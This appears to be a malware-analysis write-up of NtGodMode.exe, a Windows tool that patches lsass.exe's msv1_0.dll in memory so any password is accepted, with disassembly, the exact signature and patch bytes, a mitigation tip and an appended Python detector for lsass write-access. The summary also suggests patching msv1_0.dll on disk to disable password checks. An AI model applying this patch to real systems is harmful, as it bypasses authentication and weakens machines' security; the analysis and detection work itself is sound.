Analysis of what NtGodMode.exe does - vulnerability research
Last Update:2017-01-18
Source: Internet
Author: User
by http://tmdnet.nothave.com
NtGodModex.exe http://www.xfocus.net/tools/200804/1272.html
NtGodMode.exe: 9.00 KB (9,216 bytes), UPX packed; unpacked directly with OllyDbg, the unpacking steps are omitted
NtGodMode~.exe (unpacked): 123,392 bytes; viewed with a PE tool, it is written in Delphi
00403220 > PUSH EBP
00403221 8BEC MOV EBP,ESP
00403223 B9 0D000000 MOV ECX,0D
00403228 6A PUSH 0
0040322A 6A PUSH 0
0040322C DEC ECX
0040322D ^ F9 JNZ SHORT ntgodmod.00403228
0040322F PUSH ECX
00403230 PUSH EBX
00403231 PUSH ESI
00403232 PUSH EDI
00403233 A1 9C404000 MOV EAX,DWORD PTR DS:[40409C]
00403238 C600 MOV BYTE PTR DS:[EAX],1
0040323B B8 C0314000 MOV EAX,ntgodmod.004031C0
00403240 E8 13EEFFFF CALL ntgodmod.00402058 // gets its own process handle (base address)
00403245 BB 60574000 MOV EBX,ntgodmod.00405760
0040324A 33C0 XOR EAX,EAX
0040324C PUSH EBP
0040324D 80384000 PUSH ntgodmod.00403880
00403252 64:FF30 PUSH DWORD PTR FS:[EAX]
00403255 64:8920 MOV DWORD PTR FS:[EAX],ESP
00403258 E8 1BF2FFFF CALL ntgodmod.00402478
0040325D DEC EAX
0040325E 7D JGE SHORT ntgodmod.004032C1 // -> 004032C1
00403260 E8 4FFEFFFF CALL ntgodmod.004030B4
00403265 98384000 PUSH ntgodmod.00403898 ; ASCII "Usage:"
0040326A 8D55 E4 LEA EDX,DWORD PTR SS:[EBP-1C]
0040326D 33C0 XOR EAX,EAX
0040326F E8 F8F0FFFF CALL ntgodmod.0040236C
00403274 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
00403277 8D55 E8 LEA EDX,DWORD PTR SS:[EBP-18]
0040327A E8 11F4FFFF CALL ntgodmod.00402690
0040327F FF75 E8 PUSH DWORD PTR SS:[EBP-18]
00403282 A8384000 PUSH ntgodmod.004038A8 ; ASCII "on|off "
00403287 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040328A BA 03000000 MOV EDX,3
0040328F E8 70E9FFFF CALL ntgodmod.00401C04
///////////////////////////////////////////////////////////////////////////////////////////////////
004032C1 A1 8C404000 MOV EAX,DWORD PTR DS:[40408C]
004032C6 E8 61EAFFFF CALL ntgodmod.00401D2C
004032CB PUSH EAX // "msv1_0.dll"
004032CC E8 BFEEFFFF CALL <JMP.&KERNEL32.LoadLibraryA> // LoadLibraryA("msv1_0.dll")
004032D1 A3 4C574000 MOV DWORD PTR DS:[40574C],EAX // save the msv1_0.dll base address
004032D6 833D 4C574000 0> CMP DWORD PTR DS:[40574C],0
004032DD 0F84 82050000 JE ntgodmod.00403865
004032E3 33C0 XOR EAX,EAX
004032E5 A3 50574000 MOV DWORD PTR DS:[405750],EAX
004032EA A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
004032EF 8903 MOV DWORD PTR DS:[EBX],EAX
004032F1 33C0 XOR EAX,EAX
004032F3 PUSH EBP
004032F4 50334000 PUSH ntgodmod.00403350
004032F9 64:FF30 PUSH DWORD PTR FS:[EAX]
004032FC 64:8920 MOV DWORD PTR FS:[EAX],ESP
004032FF 8B03 MOV EAX,DWORD PTR DS:[EBX] // msv1_0.dll base address
00403301 8038 8B CMP BYTE PTR DS:[EAX],8B
00403304 1C JNZ SHORT ntgodmod.00403322
00403306 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403308 INC EAX
00403309 8038 4D CMP BYTE PTR DS:[EAX],4D
0040330C JNZ SHORT ntgodmod.00403322
0040330E 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403310 83C0 ADD EAX,2
00403313 8038 0C CMP BYTE PTR DS:[EAX],0C
00403316 0A JNZ SHORT ntgodmod.00403322
00403318 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040331A 83C0 ADD EAX,3
0040331D 8038 CMP BYTE PTR DS:[EAX],49 // search the msv1_0.dll address space for the signature bytes 8B 4D 0C 49
00403320 JE SHORT ntgodmod.00403326 // if found, keep searching forward for 32 C0
00403322 FF03 INC DWORD PTR DS:[EBX]
00403324 ^ EB D9 JMP SHORT ntgodmod.004032FF
00403326 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403328 8038 CMP BYTE PTR DS:[EAX],32
0040332B JNZ SHORT ntgodmod.0040333E
0040332D 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040332F INC EAX
00403330 8038 C0 CMP BYTE PTR DS:[EAX],0C0
00403333 JNZ SHORT ntgodmod.0040333E
00403335 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403337 A3 50574000 MOV DWORD PTR DS:[405750],EAX // save the address found to [405750]
0040333C EB JMP SHORT ntgodmod.00403342
0040333E FF03 INC DWORD PTR DS:[EBX] // advance the pointer by 1
00403340 ^ EB E4 JMP SHORT ntgodmod.00403326
00403342 33C0 XOR EAX,EAX
00403344 5A POP EDX
00403345 POP ECX
00403346 POP ECX
00403347 64:8910 MOV DWORD PTR FS:[EAX],EDX
0040334A 57334000 PUSH ntgodmod.00403357
0040334F C3 RETN
00403357 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
0040335C 2B05 4C574000 SUB EAX,DWORD PTR DS:[40574C] // found address - msv1_0.dll base address = offset of the signature
00403362 A3 50574000 MOV DWORD PTR DS:[405750],EAX // offset -> [405750]
00403367 A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
0040336C PUSH EAX
0040336D E8 E6EDFFFF CALL <JMP.&KERNEL32.FreeLibrary>
00403372 C605 9C584000 0> MOV BYTE PTR DS:[40589C],0
00403379 C605 91584000 0> MOV BYTE PTR DS:[405891],0
00403380 C605 9D584000 0> MOV BYTE PTR DS:[40589D],0
00403387 E8 28FDFFFF CALL ntgodmod.004030B4 // displays the author information
0040338C 8D55 DC LEA EDX,DWORD PTR SS:[EBP-24]
0040338F B8 02000000 MOV EAX,2
00403394 E8 D3EFFFFF CALL ntgodmod.0040236C
...
/////////////////////////////////////////////////////////////////////////////////////////////
Elevating its own privileges: enabling SeDebugPrivilege
Http://tmdnet.nothave.com/tmp/NtGodMode.txt
00402F1C PUSH EBX ; ntgodmod.00405760
00402F1D 83C4 E8 ADD ESP,-18
00402F20 33DB XOR EBX,EBX
00402F22 PUSH ESP
00402F23 6A PUSH 28 // TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
00402F25 E8 3EF2FFFF CALL <JMP.&KERNEL32.GetCurrentProcess>
00402F2A PUSH EAX
00402F2B E8 F8F1FFFF CALL <JMP.&ADVAPI32.OpenProcessToken>
00402F30 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
00402F34 PUSH EAX
00402F35 7C2F4000 PUSH ntgodmod.00402F7C ; ASCII "SeDebugPrivilege"
00402F3A 6A PUSH 0
00402F3C E8 DFF1FFFF CALL <JMP.&ADVAPI32.LookupPrivilegeValueA>
00402F41 85C0 TEST EAX,EAX
00402F43 JE SHORT ntgodmod.00402F75
00402F45 C74424 01000> MOV DWORD PTR SS:[ESP+8],1 // PrivilegeCount = 1
00402F4D C74424 02000> MOV DWORD PTR SS:[ESP+14],2 // Attributes = SE_PRIVILEGE_ENABLED
00402F55 8D4424 LEA EAX,DWORD PTR SS:[ESP+4]
00402F59 PUSH EAX
00402F5A 6A PUSH 0
00402F5C 6A PUSH 10
00402F5E 8D4424 LEA EAX,DWORD PTR SS:[ESP+14]
00402F62 PUSH EAX
00402F63 6A PUSH 0
00402F65 8B4424 MOV EAX,DWORD PTR SS:[ESP+14]
00402F69 PUSH EAX
00402F6A E8 A9F1FFFF CALL <JMP.&ADVAPI32.AdjustTokenPrivileges>
00402F6F 83F8 CMP EAX,1
00402F72 1BDB SBB EBX,EBX
00402F74 INC EBX
00402F75 8BC3 MOV EAX,EBX
00402F77 83C4 ADD ESP,18
00402F7A 5B POP EBX
00402F7B C3 RETN
///////////////////////////////////////////////////////////////////////////////////////////////
... (this section obtains the PID of lsass.exe from the process name; too long, omitted) ...
///////////////////////////////////////////////////////////////////////////////////////////////
0040358A PUSH EAX
0040358B 6A PUSH 0
0040358D FF0F1F00 PUSH 1F0FFF // PROCESS_ALL_ACCESS
00403592 E8 01ECFFFF CALL <JMP.&KERNEL32.OpenProcess> // opens the %SystemRoot%\system32\lsass.exe process
00403597 8BF0 MOV ESI,EAX
00403599 85F6 TEST ESI,ESI
0040359B 1E JNZ SHORT ntgodmod.004035BB
0040359D A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004035A2 BA 10394000 MOV EDX,ntgodmod.00403910 ; ASCII "Sorry. I can't do more."
004035A7 E8 78E8FFFF CALL ntgodmod.00401E24
004035AC E8 6FE1FFFF CALL ntgodmod.00401720
004035B1 E8 3EDCFFFF CALL ntgodmod.004011F4
004035B6 E9 AA020000 JMP ntgodmod.00403865
004035BB B8 A0584000 MOV EAX,ntgodmod.004058A0
004035C0 BA 00000100 MOV EDX,10000
004035C5 E8 0EECFFFF CALL ntgodmod.004021D8
004035CA A0584100 PUSH ntgodmod.004158A0
004035CF BA A0584000 MOV EDX,ntgodmod.004058A0
004035D4 B9 00000100 MOV ECX,10000
004035D9 8BC6 MOV EAX,ESI
004035DB E8 A4F8FFFF CALL ntgodmod.00402E84
004035E0 8B3D A0584100 MOV EDI,DWORD PTR DS:[4158A0]
004035E6 4F DEC EDI
004035E7 85FF TEST EDI,EDI
004035E9 0F82 D6000000 JB ntgodmod.004036C5
004035EF INC EDI
004035F0 C705 58574000 0> MOV DWORD PTR DS:[405758],0
004035FA BB A0584000 MOV EBX,ntgodmod.004058A0
004035FF 833B CMP DWORD PTR DS:[EBX],0
00403602 0F84 BD000000 JE ntgodmod.004036C5
00403608 C705 A4584100 C> MOV DWORD PTR DS:[4158A4],0C8
00403612 A1 A4584100 MOV EAX,DWORD PTR DS:[4158A4]
00403617 PUSH EAX
00403618 B9 A8584100 MOV ECX,ntgodmod.004158A8
0040361D 8B13 MOV EDX,DWORD PTR DS:[EBX]
0040361F 8BC6 MOV EAX,ESI
00403621 E8 8EF8FFFF CALL ntgodmod.00402EB4
///////////////////////////////////////////////////////////////////////////////////////////////////
00403732 5C574000 PUSH ntgodmod.0040575C // lpflOldProtect
00403737 6A PUSH 40 // PAGE_EXECUTE_READWRITE
00403739 6A PUSH 2 // dwSize = 2 bytes
0040373B A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403740 PUSH EAX
00403741 PUSH ESI
00403742 E8 79EAFFFF CALL <JMP.&KERNEL32.VirtualProtectEx>
00403747 98584000 PUSH ntgodmod.00405898
0040374C 6A PUSH 2
0040374E 90404000 PUSH ntgodmod.00404090
00403753 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403758 PUSH EAX
00403759 PUSH ESI
0040375A E8 69EAFFFF CALL <JMP.&KERNEL32.WriteProcessMemory> // patches 32 C0 (XOR AL,AL) to B0 01 (MOV AL,1)
0040375F B0 MOV AL,4
00403761 E8 DEEFFFFF CALL ntgodmod.00402744
00403766 A1 98404000 MOV EAX,DWORD PTR DS:[404098]
0040376B BA 70394000 MOV EDX,ntgodmod.00403970 ; ASCII "Open God mode!"
00403770 E8 AFE6FFFF CALL ntgodmod.00401E24
00403775 E8 A6DFFFFF CALL ntgodmod.00401720
0040377A E8 75DAFFFF CALL ntgodmod.004011F4
0040377F 33C0 XOR EAX,EAX
00403781 E8 BEEFFFFF CALL ntgodmod.00402744
00403786 EB JMP SHORT ntgodmod.004037DC
00403788 5C574000 PUSH ntgodmod.0040575C
0040378D 6A PUSH 40
0040378F 6A PUSH 2
00403791 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403796 PUSH EAX
00403797 PUSH ESI
00403798 E8 23EAFFFF CALL <JMP.&KERNEL32.VirtualProtectEx>
0040379D 98584000 PUSH ntgodmod.00405898
004037A2 6A PUSH 2
004037A4 94404000 PUSH ntgodmod.00404094
004037A9 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
004037AE PUSH EAX
004037AF PUSH ESI
004037B0 E8 13EAFFFF CALL <JMP.&KERNEL32.WriteProcessMemory>
004037B5 B0 MOV AL,7
004037B7 E8 88EFFFFF CALL ntgodmod.00402744
004037BC A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004037C1 BA 88394000 MOV EDX,ntgodmod.00403988 ; ASCII "Close God mode!"
004037C6 E8 59E6FFFF CALL ntgodmod.00401E24
004037CB E8 50DFFFFF CALL ntgodmod.00401720
004037D0 E8 1FDAFFFF CALL ntgodmod.004011F4
004037D5 33C0 XOR EAX,EAX
004037D7 E8 68EFFFFF CALL ntgodmod.00402744
004037DC 6A PUSH 0
004037DE 6A PUSH 0
004037E0 PUSH ESI
004037E1 E8 6AE9FFFF CALL <JMP.&KERNEL32.FlushInstructionCache>
Summary
NtGodMode.exe works by opening the lsass.exe process, locating the address space of its msv1_0.dll module, searching for the signature bytes 8B 4D 0C 49, and then for the first 32 C0 after them.
That 32 C0 is an XOR AL,AL; it is patched to B0 01, which is MOV AL,1.
Why does MOV AL,1 mean no password is required? Interested readers can set up a virtual machine and debug lsass.exe to see for themselves.
On my own machine (Win2K SP4) this program does not work; I traced it, and the main reason is that the signature it searches for is not universal, so it patches the wrong place.
On XP SP2 and XP SP3 it works.
If you also want to make your own machine immune to this thing, it is actually very simple: Control Panel -> Administrative Tools -> Local Security Policy -> Local Policies -> User Rights Assignment -> Debug programs.
There is an Administrators entry there; remove it. Because the program's code for elevating its own privileges is very old, very poor and very weak, it will then be ineffective.
In fact, to make use of this thing one could, by programming, turn off Windows File Protection and patch the msv1_0.dll PE file directly, so that the machine never asks for a password; if many machines access shared files, that is also convenient, and computers should be people-oriented.
Finally, let me say that things written in Delphi are no good; far too much rubbish~!!
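As an added defensive example (not part of the original analysis or the tool's code), the Python below flags the access pattern the listing shows: a process opening lsass.exe with rights that include PROCESS_VM_OPERATION and PROCESS_VM_WRITE, the minimum needed for VirtualProtectEx and WriteProcessMemory (the tool asks for the full 0x1F0FFF mask). The log lines and the "Key: Value | ..." layout are constructed here to resemble Sysmon Event ID 10 ProcessAccess records; they are not real telemetry.

```python
import re

# Process access-right bits as defined in winnt.h.
PROCESS_VM_OPERATION = 0x0008   # required by VirtualProtectEx
PROCESS_VM_WRITE     = 0x0020   # required by WriteProcessMemory
PROCESS_ALL_ACCESS   = 0x1F0FFF # the mask NtGodMode.exe passes to OpenProcess

# Constructed sample records in a simplified Sysmon Event ID 10 layout.
# Field names follow Sysmon; the lines themselves are made up for this example.
SAMPLE_LOG = """\
SourceImage: C:\\Windows\\System32\\svchost.exe | TargetImage: C:\\Windows\\System32\\lsass.exe | GrantedAccess: 0x1000
SourceImage: C:\\Tools\\NtGodMode.exe | TargetImage: C:\\Windows\\System32\\lsass.exe | GrantedAccess: 0x1F0FFF
SourceImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe | TargetImage: C:\\Windows\\System32\\lsass.exe | GrantedAccess: 0x1410
SourceImage: C:\\Tools\\patcher.exe | TargetImage: C:\\Windows\\explorer.exe | GrantedAccess: 0x1F0FFF
"""

# One "Key: Value" pair, terminated by the next "|" separator or end of line.
FIELD_RE = re.compile(r"(\w+):\s*([^|]+?)\s*(?:\||$)")

def parse_record(line):
    """Turn one 'Key: Value | Key: Value' line into a dict."""
    return {key: value for key, value in FIELD_RE.findall(line)}

def is_lsass_write_access(record):
    """True when lsass.exe was opened with enough rights to patch its memory."""
    target = record.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    mask = int(record.get("GrantedAccess", "0"), 16)
    needed = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
    return (mask & needed) == needed   # both bits present, not just any one

def find_suspicious(log_text):
    """Return the SourceImage of every record that opened lsass.exe with write rights."""
    hits = []
    for line in log_text.splitlines():
        record = parse_record(line)
        if record and is_lsass_write_access(record):
            hits.append(record["SourceImage"])
    return hits

if __name__ == "__main__":
    for source in find_suspicious(SAMPLE_LOG):
        print("lsass.exe opened with VM_WRITE|VM_OPERATION by:", source)
```

The read-only handles in the sample (0x1000, 0x1410) are not flagged, which is the distinction the check relies on: the patch needs write and operation rights, ordinary querying does not.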